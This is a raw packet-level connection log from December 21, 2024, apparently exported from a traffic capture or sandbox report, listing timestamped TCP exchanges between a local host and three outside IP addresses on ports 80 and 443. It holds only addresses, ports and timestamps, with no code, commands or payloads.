                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.118227959 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.118360996 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.118386030 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.118438005 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.119427919 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.119565964 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.120353937 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.120646954 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.120759010 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.120776892 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.120891094 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.121815920 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.121902943 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.121932030 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.122015953 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.123050928 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.123150110 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.123178005 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.123276949 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.124219894 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.124285936 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.124345064 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.124711990 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.125365973 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.125504017 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.125530958 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.126696110 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.126765966 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.126796961 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.127701044 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.127765894 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.127881050 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.127888918 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.128021955 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.128954887 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.129035950 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.129065037 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.129157066 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.130155087 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.130228996 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.130249977 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.130304098 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.131356001 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.131431103 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.131457090 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.131736994 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.132582903 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.132596970 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.132647991 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.132647991 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:23.595756054 CET4978680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:23.596033096 CET4979280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:23.715832949 CET8049792185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:23.715879917 CET8049786185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:23.715893984 CET4979280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:23.716051102 CET4978680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:23.720729113 CET4979280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:23.840183973 CET8049792185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.061853886 CET8049792185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.061904907 CET4979280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.068802118 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.069282055 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.188819885 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.188895941 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.189002991 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.189049959 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.210086107 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.329535961 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.563950062 CET49794443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.564063072 CET44349794172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.564203024 CET49794443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.566879034 CET49794443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:25.566919088 CET44349794172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516444921 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516458035 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516469002 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516539097 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516669989 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516681910 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516702890 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516736031 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.516771078 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517160892 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517173052 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517215967 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517468929 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517481089 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.517533064 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.636172056 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.636348963 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.636373043 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.636430979 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.640425920 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.640516043 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.640583992 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.648828030 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.652354956 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.708233118 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.708268881 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.708452940 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.710695028 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.710875034 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.710938931 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.718976974 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.719063044 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.719101906 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.719541073 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.725492001 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.725594997 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.725681067 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.797715902 CET44349794172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.797914028 CET49794443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.799998999 CET49794443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.800028086 CET44349794172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.800364017 CET44349794172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.863444090 CET49794443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.863444090 CET49794443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:26.863703012 CET44349794172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.556881905 CET44349794172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.557156086 CET44349794172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.557373047 CET49794443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.558959007 CET49794443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.558996916 CET44349794172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.609289885 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.609323025 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.609405041 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.609666109 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:27.609679937 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.848864079 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.848985910 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.886970043 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.886981964 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.888025045 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.889204025 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.889230967 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.889393091 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.896640062 CET4979280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:28.896914005 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.016592026 CET8049796185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.016608953 CET8049792185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.016771078 CET4979280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.016773939 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.017126083 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.136665106 CET8049796185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.653367043 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.653501987 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.653559923 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.653570890 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.653702021 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.653753996 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.653760910 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.655742884 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.655807972 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.655814886 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.664206982 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.664254904 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.664261103 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.676095009 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.676162958 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.676168919 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.734317064 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.772840023 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.848870039 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.848947048 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.848957062 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.849173069 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.849225998 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.849231005 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.849376917 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.849432945 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.868062973 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.868071079 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.868097067 CET49795443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:29.868102074 CET44349795172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.351469040 CET8049796185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.351540089 CET4979680192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.358068943 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.358515978 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.478127956 CET804979331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.478148937 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.478194952 CET4979380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.478347063 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.491219044 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.550580025 CET49798443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.550621986 CET44349798172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.550714016 CET49798443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.550960064 CET49798443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.550976038 CET44349798172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:30.612134933 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.771047115 CET44349798172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.771116972 CET49798443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.779387951 CET49798443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.779409885 CET44349798172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.779779911 CET44349798172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.781689882 CET49798443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.784028053 CET49798443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.784080982 CET44349798172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.784142971 CET49798443192.168.2.4172.67.209.202
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.784152985 CET44349798172.67.209.202192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803301096 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803353071 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803478003 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803493023 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803520918 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803535938 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803889036 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803903103 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803915024 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803924084 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.803975105 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.804619074 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.804632902 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.804646015 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.804658890 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.804672956 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.804689884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.922967911 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.923021078 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.923115015 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.923158884 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.927125931 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.927167892 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.995461941 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.995512962 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.995631933 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.995678902 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.999645948 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.999690056 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.999799967 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:31.999840021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.008043051 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.008085966 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.008117914 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.008151054 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.016406059 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.016449928 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.016521931 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.016560078 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.024828911 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.024872065 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.024908066 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.024945021 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.033180952 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.033222914 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.033299923 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.033340931 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.041670084 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.041737080 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.041771889 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.041816950 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.049947023 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.049988985 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.050112009 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.050149918 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.058398962 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.058449030 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.058484077 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.058521986 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.066785097 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.066833019 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.066905022 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.066945076 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.074510098 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.074537039 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.074563980 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.074579954 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.115001917 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.115044117 CET4979780192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.115118027 CET804979731.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:32.115158081 CET4979780192.168.2.431.41.244.11
